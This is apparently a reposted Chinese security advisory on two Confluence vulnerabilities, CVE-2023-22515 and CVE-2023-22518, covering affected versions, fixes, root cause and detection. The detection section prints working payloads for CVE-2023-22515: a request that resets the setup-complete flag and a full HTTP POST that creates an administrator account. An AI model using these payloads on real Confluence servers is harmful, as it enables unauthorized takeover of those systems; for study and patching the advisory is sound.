免责声明
❝
本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。
❞
漏洞介绍:
❝
Confluence是由Atlassian开发的一款协作式知识管理和团队协作工具。
❞
CVE-2023-22515
Atlassian 已了解到少数客户报告的一个问题,即外部攻击者可能已利用公开访问的 Confluence 数据中心和服务器实例中一个先前未知的漏洞,创建了未经授权的 Confluence 管理员帐户并访问了 Confluence 实例。Atlassian Cloud 站点不受此漏洞影响。如果您的 Confluence 站点通过 atlassian.net 域访问,则该站点由 Atlassian 托管,不会受到此问题的影响。在NVD漏洞库中CVSS赋分甚至为满分:
影响版本
修复版本
7.x 版本的用户需更新至 7.19.16 以上
8.3.x 版本的用户需更新至 8.3.4 以上
8.4.x 版本的用户需更新至 8.4.4 以上
8.5.x 版本的用户需更新至 8.5.3 以上
8.6.x 版本的用户需更新至 8.6.1以上
CVE-2023-22518
CVE-2023-22518是Confluence中存在一个远程代码执行漏洞。Confluence 数据中心和服务器的所有版本均受此未利用漏洞影响。由于攻击者无法外泄任何实例数据,因此对保密性没有影响。Atlassian Cloud 站点不受此漏洞影响。如果您的 Confluence 站点通过 atlassian.net 域访问,则该站点由 Atlassian 托管,不会受到此问题的影响。
影响版本
❝
Confluence Data Center and Server 所有版本 由矢量得知漏洞对数据完整性有重大危害,强烈建议及时修复漏洞和做好防护。
❞
漏洞分析
CVE-2023-22515
CVE-2023-22515 是一个影响 Confluence Server 和 Confluence Data Center的权限提升严重漏洞,由未授权加xwork框架的一个功能引起Confluence是建立在Apache Struts框架之上的,作为其中的一部分使用了框架。XWork 框架允许通过 HTTP 请求中提供的 HTTP 参数在 Java 对象上设置参数。这是 Confluence 的一个已知安全问题。这个漏洞的效果是达到可以创建一个管理员账户信息的一个效果,而这个创建管理员信息则是在安装网站的时候进行创建,访问/setup/setupadministrator.action目录则可以进行创建管理员账户。
CVE-2023-22518
在复杂的软件架构中,包的继承和命名空间的使用提供了强大的灵活性,但也带来了潜在的安全风险。当子包继承父包时,它们也继承了父包的接口,但并不总是继承相关的安全控制。在 Confluence 这个案例中,Confluence 滥用了 Struts2 的继承关系,从而导致可以一定程度绕过它自身的权限校验,最终通过部分接口串联利用实现无需认证的远程代码执行。
漏洞影响
成功利用这个漏洞的攻击者可以在一定程度上绕过身份验证,而后可以通过串联后台接口,无需认证即可控制并且接管服务器。需要特别注意的是,该漏洞利用会导致 Confluence 数据清空,对应用数据完整性产生不可逆的影响。
漏洞检测
CVE-2023-22515手工检测
环境搭建和POC使用请阅读:点击这里
Payload 1:
/server-info.action?BootstrapStatusProvider.applicationConfig.setupComplete=false
Payload 2:
etupadministrator.action HTTP/1.1
Host: 192.168.168.129:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed- exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B3FC576A89A343C219366798C6DA400F
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
username=user&fullName=user&[email protected]&password=user&confirm=user&setup-next-button=Next
CVE-2023-22518自动化检测
牧云本地检测工具
检测方法:在本地主机上执行以下命令即可扫描:
./atlassian_confluence_rce_cve_2023_22518_scanner_linux_amd64 scan
工具获取方式:
https://stack.chaitin.com/tool/detail/1249
参考:
https://mp.weixin.qq.com/s/W2etlcCDYu-y79Tih7edRA
https://mp.weixin.qq.com/s/Yh92tfQRgKXP0_K4foWcfw
原文始发于微信公众号(WIN哥学安全):【0day+满分漏洞】CVE-2023-22518和CVE-2023-225155(附POC和检测工具】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论